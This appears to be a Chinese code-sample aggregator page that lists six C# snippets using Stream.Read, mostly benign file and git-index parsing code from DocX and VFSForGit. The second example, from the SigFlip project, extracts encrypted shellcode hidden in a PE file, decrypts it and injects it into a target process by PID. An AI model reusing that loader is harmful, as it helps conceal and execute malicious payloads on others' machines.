C# Stream.Read的代码示例
通过代码示例来学习C# Stream.Read方法
1. 代码示例提供了一个具体而直观的学习环境,使初学者能够立即看到编程概念和语法的实际应用。
2. 通过分析和模仿现有的代码实例,初学者可以更好地理解编程逻辑和算法的工作原理。
3. 代码实例往往涵盖了多种编程技巧和最佳实践,通过学习和模仿这些实例,学习者可以逐步掌握如何编写高效、可读性强和可维护的代码。这对于初学者来说,是一种快速提升编程水平的有效途径。
Stream.Read是C#的System.IO命名空间下中的一个方法, 小编为大家找了一些网络大拿们常见的代码示例,源码中的Stream.Read() 已经帮大家高亮显示了,大家可以重点学习Stream.Read() 方法的写法,从而快速掌握该方法的应用。
Stream.Read的代码示例1 - LoadDocumentWithStream()
using System.IO;
public static void LoadDocumentWithStream()
using( var fs = new FileStream( DocumentSample.DocumentSampleResourcesDirectory + @"First.docx", FileMode.Open, FileAccess.Read, FileShare.Read ) )
using( var doc = DocX.Load( fs ) )
// Add a title
doc.InsertParagraph( 0, "Load Document with Stream", false ).FontSize( 15d ).SpacingAfter( 50d ).Alignment = Alignment.center;
// Insert a Paragraph into this document.
var p = doc.InsertParagraph();
// Append some text and add formatting.
p.Append( "A small paragraph was added." );
doc.SaveAs( DocumentSample.DocumentSampleOutputDirectory + @"LoadDocumentWithStream.docx" );
开发者ID: xceedsoftware, 项目名称: DocX, 代码行数: 21, 代码来源: DocumentSample.cs
在xceedsoftware提供的LoadDocumentWithStream()方法中,该源代码示例一共有21行, 其中使用了Stream.Read()2次, 并且小编将这些方法高亮显示出来了,希望对您了解Stream.Read()有帮助。 如果您觉得有帮助的话,请帮忙点赞或转发。
该代码示例的点赞次数为3, 点赞数越大, 从某种程度说明这个示例对了解Stream.Read()可能更有帮助。
Stream.Read的代码示例2 - Main()
using System.IO;
public static void Main(string[] args)
ArgumentParser _parser = new ArgumentParser(args);
if (args.Length <= 0 || _parser.GetOrDefault("h", "help") == "true") {
if (_parser.GetOrDefault("f", "null") != "null") {
_pePath = _parser.GetOrDefault("f", "null");
_encKey = _parser.GetOrDefault("e", "null");
_pid = _parser.GetOrDefault("pid", "null");
if (_pePath == "null") Help();
if (_pid == "null") Help();
else {
if (!File.Exists(_pePath)) Help();
Console.WriteLine("[+]:Loading/Parsing PE File '{0}'", _pePath);
byte[] _peBlob = Utils.Read(_pePath);
int _dataOffset = Utils.scanPattern(_peBlob, _tag);
Console.WriteLine("[+]:Scanning for Shellcode...");
if ( _dataOffset == -1) {
Console.WriteLine("Could not locate data or shellcode");
Stream stream = new MemoryStream(_peBlob);
long pos = stream.Seek(_dataOffset + _tag.Length, SeekOrigin.Begin);
Console.WriteLine("[+]: Shellcode located at {0:x2}", pos);
byte[] shellcode = new byte[_peBlob.Length - (pos + _tag.Length)];
stream.Read(shellcode, 0, (_peBlob.Length)- ((int)pos + _tag.Length));
byte[] _data = Utils.Decrypt(shellcode, _encKey);
//Execute shellcode (just a basic/vanilla local shellcode injection logic, make sure to CHANGE this and use your custom shellcode loader.
Loader.rexec(Convert.ToInt32(_pid), _data);
开发者ID: med0x2e, 项目名称: SigFlip, 代码行数: 56, 代码来源: Program.cs
在med0x2e提供的Main()方法中,该源代码示例一共有56行, 其中使用了Stream.Read()2次, 并且小编将这些方法高亮显示出来了,希望对您了解Stream.Read()有帮助。 如果您觉得有帮助的话,请帮忙点赞或转发。
该代码示例的点赞次数为3, 点赞数越大, 从某种程度说明这个示例对了解Stream.Read()可能更有帮助。
Stream.Read的代码示例3 - GetIndexHash()
using System.IO;
private byte[] GetIndexHash()
if (this.shouldHashIndex)
using (Stream fileStream = new FileStream(this.indexLockPath, FileMode.Open, FileAccess.Read, FileShare.Write))
using (HashingStream hasher = new HashingStream(fileStream))
return hasher.Hash;
return new byte[20];
开发者ID: microsoft, 项目名称: VFSForGit, 代码行数: 16, 代码来源: GitIndexGenerator.cs
在microsoft提供的GetIndexHash()方法中,该源代码示例一共有16行, 其中使用了Stream.Read()1次, 并且小编将这些方法高亮显示出来了,希望对您了解Stream.Read()有帮助。 如果您觉得有帮助的话,请帮忙点赞或转发。
该代码示例的点赞次数为3, 点赞数越大, 从某种程度说明这个示例对了解Stream.Read()可能更有帮助。
Stream.Read的代码示例4 - TryWriteTempFile()
using System.IO;
public virtual bool TryWriteTempFile(
ITracer tracer,
Stream source,
string tempFilePath,
out long fileLength,
out Task flushTask,
bool throwOnError = false)
fileLength = 0;
flushTask = null;
Stream fileStream = null;
fileStream = this.fileSystem.OpenFileStream(
callFlushFileBuffers: false); // Any flushing to disk will be done asynchronously
StreamUtil.CopyToWithBuffer(source, fileStream);
fileLength = fileStream.Length;
if (this.Enlistment.FlushFileBuffersForPacks)
// Flush any data buffered in FileStream to the file system
// FlushFileBuffers using FlushAsync
// Do this last to ensure that the stream is not being accessed after it's been disposed
flushTask = fileStream.FlushAsync().ContinueWith((result) => fileStream.Dispose());
if (flushTask == null && fileStream != null)
this.ValidateTempFile(tempFilePath, tempFilePath);
catch (Exception ex)
if (flushTask != null)
flushTask = null;
this.CleanupTempFile(this.Tracer, tempFilePath);
if (tracer != null)
EventMetadata metadata = CreateEventMetadata(ex);
metadata.Add("tempFilePath", tempFilePath);
tracer.RelatedWarning(metadata, $"{nameof(this.TryWriteTempFile)}: Exception caught while writing temp file", Keywords.Telemetry);
if (throwOnError)
return false;
return true;
开发者ID: microsoft, 项目名称: VFSForGit, 代码行数: 77, 代码来源: GitObjects.cs
在microsoft提供的TryWriteTempFile()方法中,该源代码示例一共有77行, 其中使用了Stream.Read()1次, 并且小编将这些方法高亮显示出来了,希望对您了解Stream.Read()有帮助。 如果您觉得有帮助的话,请帮忙点赞或转发。
该代码示例的点赞次数为3, 点赞数越大, 从某种程度说明这个示例对了解Stream.Read()可能更有帮助。
Stream.Read的代码示例5 - ReadLooseObjectHeader()
using System.IO;
private static bool ReadLooseObjectHeader(Stream input, out long size)
size = 0;
byte[] buffer = new byte[5];
input.Read(buffer, 0, buffer.Length);
if (!Enumerable.SequenceEqual(buffer, LooseBlobHeader))
return false;
while (true)
int v = input.ReadByte();
if (v == -1)
return false;
if (v == '\0')
size = (size * 10) + (v - '0');
return true;
开发者ID: microsoft, 项目名称: VFSForGit, 代码行数: 31, 代码来源: GitRepo.cs
在microsoft提供的ReadLooseObjectHeader()方法中,该源代码示例一共有31行, 其中使用了Stream.Read()1次, 并且小编将这些方法高亮显示出来了,希望对您了解Stream.Read()有帮助。 如果您觉得有帮助的话,请帮忙点赞或转发。
该代码示例的点赞次数为3, 点赞数越大, 从某种程度说明这个示例对了解Stream.Read()可能更有帮助。
Stream.Read的代码示例6 - ParseIndex()
using System.IO;
private void ParseIndex(Stream indexStream)
byte[] buffer = new byte[40];
indexStream.Position = 0;
byte[] signature = new byte[4];
indexStream.Read(signature, 0, 4);
if (!Enumerable.SequenceEqual(MagicSignature, signature))
throw new InvalidDataException("Incorrect magic signature for index: " + string.Join(string.Empty, signature.Select(c => (char)c)));
this.IndexVersion = this.ReadUInt32(buffer, indexStream);
if (this.IndexVersion < 2 || this.IndexVersion > 4)
throw new InvalidDataException("Unsupported index version: " + this.IndexVersion);
this.entryCount = this.ReadUInt32(buffer, indexStream);
this.tracer.RelatedEvent(EventLevel.Informational, "IndexData", new EventMetadata() { { "Index", this.indexPath }, { "Version", this.IndexVersion }, { "entryCount", this.entryCount } }, Keywords.Telemetry);
this.indexEntryOffsets = new Dictionary((int)this.entryCount, GVFSPlatform.Instance.Constants.PathComparer);
int previousPathLength = 0;
byte[] pathBuffer = new byte[MaxPathBufferSize];
for (int i = 0; i < this.entryCount; i++)
// See https://github.com/git/git/blob/867b1c1bf68363bcfd17667d6d4b9031fa6a1300/Documentation/technical/index-format.txt#L38
long entryOffset = indexStream.Position;
int entryLength = BaseEntryLength;
// Skip the next 60 bytes.
// 40 bytes encapsulated by IndexEntry but not needed now.
// 20 bytes of sha
indexStream.Position += 60;
ushort flags = this.ReadUInt16(buffer, indexStream);
bool isExtended = (flags & ExtendedBit) == ExtendedBit;
ushort pathLength = (ushort)(flags & 0xFFF);
entryLength += pathLength;
bool skipWorktree = false;
if (isExtended && (this.IndexVersion > 2))
ushort extendedFlags = this.ReadUInt16(buffer, indexStream);
skipWorktree = (extendedFlags & SkipWorktreeBit) == SkipWorktreeBit;
entryLength += 2;
if (this.IndexVersion == 4)
int replaceLength = this.ReadReplaceLength(indexStream);
int replaceIndex = previousPathLength - replaceLength;
indexStream.Read(pathBuffer, replaceIndex, pathLength - replaceIndex + 1);
previousPathLength = pathLength;
// Simple paths but 1 - 8 nul bytes as necessary to pad the entry to a multiple of eight bytes
int numNulBytes = 8 - (entryLength % 8);
indexStream.Read(pathBuffer, 0, pathLength + numNulBytes);
if (!skipWorktree)
// Examine only the things we're not skipping...
// Potential Future Perf Optimization: Perform this work on multiple threads. If we take the first byte and % by number of threads,
// we can ensure that all entries for a given folder end up in the same dictionary
string path = Encoding.UTF8.GetString(pathBuffer, 0, pathLength);
this.indexEntryOffsets[path] = entryOffset;
开发者ID: microsoft, 项目名称: VFSForGit, 代码行数: 78, 代码来源: Index.cs
在microsoft提供的ParseIndex()方法中,该源代码示例一共有78行, 其中使用了Stream.Read()3次, 并且小编将这些方法高亮显示出来了,希望对您了解Stream.Read()有帮助。 如果您觉得有帮助的话,请帮忙点赞或转发。
该代码示例的点赞次数为3, 点赞数越大, 从某种程度说明这个示例对了解Stream.Read()可能更有帮助。
Stream.Read的错误类型有很多, 这里就不一一阐述了,本文只列出一些常见的代码示例供参考,大家可以看一下代码中Catch语句中是否有常见的错误捕获及处理。
Stream.Read构造函数功能基本类似,只是参数不同; 目前主流的集成开发环境都已经带智能提醒了,如:Visual Studio; 大家可以非常轻松的通过Visual Studio中的智能提醒,了解对应构造函数的用法。
ChartGPT写出的代码和本文中的小编提供的代码的区别。 ChartGPT发展到现在已经非常聪明了,但需要使用这提供非常专业的问题,才可能有比较好的源代码示例; 而本文中, 小编已经帮您列出来基本所有类和所有方法的使用示例, 而且这些示例基本都是一些网络大佬提供的源码,可以更方便的供一些开发菜鸟或者资深开发参考和学习。